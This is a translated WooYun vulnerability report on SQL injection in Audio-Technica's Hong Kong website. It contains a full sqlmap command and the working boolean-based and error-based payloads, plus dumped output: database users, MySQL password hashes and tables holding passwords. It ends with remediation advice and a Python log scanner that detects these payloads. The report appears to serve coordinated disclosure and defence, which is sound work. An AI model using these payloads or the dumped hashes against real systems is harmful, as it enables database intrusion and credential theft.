
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0157264

Vulnerability title: SQL injection on the main site of 鐵三角總公司 (Audio-Technica headquarters) (DBA privileges + root password + user passwords) (Hong Kong region)

Affected vendor: 鐵三角總公司

Author: 路人甲

Submitted: 2015-12-01 12:40

Fix time: 2016-01-17 11:32

Published: 2016-01-17 11:32

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Vulnerability status: handed to a third-party partner organisation (hkcert, Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-01: Details sent to the vendor, awaiting vendor handling
2015-12-03: Vendor confirmed; details disclosed to the vendor only
2015-12-13: Details disclosed to core white hats and experts in related fields
2015-12-23: Details disclosed to regular white hats
2016-01-02: Details disclosed to intern white hats
2016-01-17: Details disclosed to the public

Brief description:

鐵三角 (Audio-Technica) was founded in Japan in 1962, and the company's global development teams have been devoted to the design, manufacture, marketing and distribution of audio equipment ever since. Starting from research into phonograph cartridges, the company today develops high-performance microphones, headphones, wireless systems, even commercial sushi rice-ball forming machines, and other high-quality electronic products for professionals and the general public.
Winner of countless awards, Audio-Technica has always made high quality, durability and value for money its primary goals, and its products perform outstandingly whether used at large concerts, in professional broadcasting, recording studios, companies, government institutions or large auditoriums. Many important government bodies, including the US House of Representatives and Senate, have chosen Audio-Technica microphones as standard equipment, and Audio-Technica microphones and wireless systems have been selected by many of the world's leading music award ceremonies, including the Grammy Awards and the Rock and Roll Hall of Fame induction ceremony.
Since 1988 Audio-Technica has provided comprehensive technical support at the US presidential debates. Its microphones have also played a major role in widely watched sports broadcasts, including the FIFA World Cup, the Super Bowl, the Commonwealth Games, the 1996 Atlanta, 2000 Sydney, 2004 Athens and 2008 Beijing Games, and the 2002 Salt Lake City, 2006 Turin and 2010 Vancouver Winter Games.
Audio-Technica Japan, besides offering a diverse range of products under its own brand, has become a leading OEM supplier of audio transducers, optical sensors and a wide variety of professional audio equipment. In 1994 the Audio-Technica group of Japan established Audio-Technica (Greater China) Ltd in Hong Kong, responsible for business development in mainland China, Hong Kong and Macau, supplying the Greater China region with everything from consumer headphones and HiFi products to professional conference systems, field broadcast, performance and recording equipment. The products of Audio-Technica US are sold throughout the Western Hemisphere. Beyond Hong Kong, subsidiaries in Singapore, Europe and elsewhere have been established and are growing rapidly. Today Audio-Technica holds a leading position in its field and is committed to providing customers worldwide with even better products and services.

Detailed description:

URL: http://**.**.**.**/index.php?op=newsList&action=details&nid=1278&lang=schi

python sqlmap.py -u "http://**.**.**.**/index.php?op=newsList&action=details&nid=1278&lang=schi" -p nid --technique=BE --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass


current user:    'webmaster@%'
current user is DBA: True
database management system users [4]:
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'webmaster'@'%'

Proof of vulnerability:

---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: op=newsList&action=details&nid=1278 AND 3798=3798&lang=schi
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: op=newsList&action=details&nid=1278 AND (SELECT 6547 FROM(SELECT COUNT(*),CONCAT(0x716b627071,(SELECT (ELT(6547=6547,1))),0x717a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&lang=schi
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user: 'webmaster@%'
current user is DBA: True
database management system users [4]:
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'webmaster'@'%'
database management system users password hashes:
[*] root [2]:
password hash: *5E6DA4BDCE20DE7D6D47E89B565F9251104E0F81
password hash: *C94109786661EF4C1AD1B420A2EFA87F243F42E5
[*] webmaster [1]:
password hash: *5E6DA4BDCE20DE7D6D47E89B565F9251104E0F81
Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| wangzi | 1 |
+---------------------------------------+---------+
Database: test_at
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| product_spec | 9039 |
| secinfo | 2295 |
| product_spec_parts | 818 |
| product | 795 |
| product_desc | 795 |
| product_file | 291 |
| product_spec_title | 167 |
| news | 163 |
| product_type | 111 |
| dealer | 68 |
| authen_shop | 57 |
| sub_category | 35 |
| province | 34 |
| client | 9 |
| client_info | 9 |
| category | 3 |
| facebook_aa | 3 |
| admin | 2 |
| email_promotion | 1 |
| member | 1 |
| member_info | 1 |
| visitor | 1 |
+---------------------------------------+---------+
Database: new_at
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| product_spec | 9644 |
| secinfo | 2543 |
| product_spec_parts | 876 |
| product | 845 |
| product_desc | 845 |
| product_file | 308 |
| news | 172 |
| product_spec_title | 169 |
| product_type | 112 |
| dealer | 69 |
| authen_shop | 57 |
| sub_category | 35 |
| province | 34 |
| client | 9 |
| client_info | 9 |
| category | 3 |
| facebook_aa | 3 |
| admin | 1 |
| email_promotion | 1 |
| member | 1 |
| member_info | 1 |
| visitor | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 992 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 277 |
| SESSION_VARIABLES | 277 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| USER_PRIVILEGES | 108 |
| STATISTICS | 100 |
| PARTITIONS | 99 |
| TABLES | 99 |
| KEY_COLUMN_USAGE | 95 |
| TABLE_CONSTRAINTS | 74 |
| CHARACTER_SETS | 36 |
| PLUGINS | 7 |
| ENGINES | 5 |
| SCHEMATA | 5 |
| PROCESSLIST | 2 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 993 |
| help_topic | 506 |
| help_keyword | 452 |
| help_category | 38 |
| `user` | 4 |
| db | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: test_at
Table: admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: test_at
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: test_at
Table: client
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: new_at
Table: admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: new_at
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: new_at
Table: client
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: mysql
Table: servers
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| Password | char(64) |
+----------+----------+

Remediation:

Deploy a WAF.
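A WAF or log rule needs something concrete to key on. The following is an added example, not part of the report: a Python check that scans constructed Apache access-log lines (the first two carry the boolean-based and error-based payloads quoted in the proof above, percent-encoded as a client would send them) and flags any request whose nid parameter is not a plain integer, plus the two sqlmap signatures seen in the proof. The log lines, client IPs and the INT_PARAMS set are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed Apache access-log lines (not taken from the report): two requests
# carrying the payloads quoted in the proof, then one legitimate request.
SAMPLE_LOG = r"""
203.0.113.5 - - [01/Dec/2015:12:40:01 +0800] "GET /index.php?op=newsList&action=details&nid=1278%20AND%203798%3D3798&lang=schi HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Dec/2015:12:40:02 +0800] "GET /index.php?op=newsList&action=details&nid=1278%20AND%20(SELECT%206547%20FROM(SELECT%20COUNT(*),CONCAT(0x716b627071,(SELECT%20(ELT(6547%3D6547,1))),0x717a767871,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&lang=schi HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Dec/2015:12:41:00 +0800] "GET /index.php?op=newsList&action=details&nid=1278&lang=schi HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Common/combined log format: client IP, timestamp, method and request target.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Parameters the application only ever uses as integers (assumption: nid is the news-item id).
INT_PARAMS = {"nid"}

# Signatures of the two sqlmap techniques in the proof, applied to the decoded value.
SIGNATURES = {
    "boolean_tautology": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "error_based_floor_rand": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "information_schema": re.compile(r"INFORMATION_SCHEMA\.", re.I),
}


def check_params(target):
    """Return a list of (param, reason) findings for one request target."""
    findings = []
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            value = unquote_plus(value)  # also catches double-encoded values
            if name in INT_PARAMS and not re.fullmatch(r"-?\d+", value):
                findings.append((name, "non_integer"))
            for label, pattern in SIGNATURES.items():
                if pattern.search(value):
                    findings.append((name, label))
    return findings


def scan_log(text):
    """Return (ip, target, findings) for every request that triggers a finding."""
    hits = []
    for line in text.strip().splitlines():
        match = REQUEST_RE.match(line)
        if match:
            findings = check_params(match.group("target"))
            if findings:
                hits.append((match.group("ip"), match.group("target"), findings))
    return hits
```

The non_integer rule is the durable one: nid is only ever used as an integer, so the same validation (and a prepared statement) belongs in index.php itself rather than only in a WAF. The webmaster database account, which the proof shows holds DBA rights, should also be cut down to the privileges the site actually needs.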

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 13

Confirmed: 2015-12-03 11:30

Vendor reply:

Referred to related parties.

Latest status:

None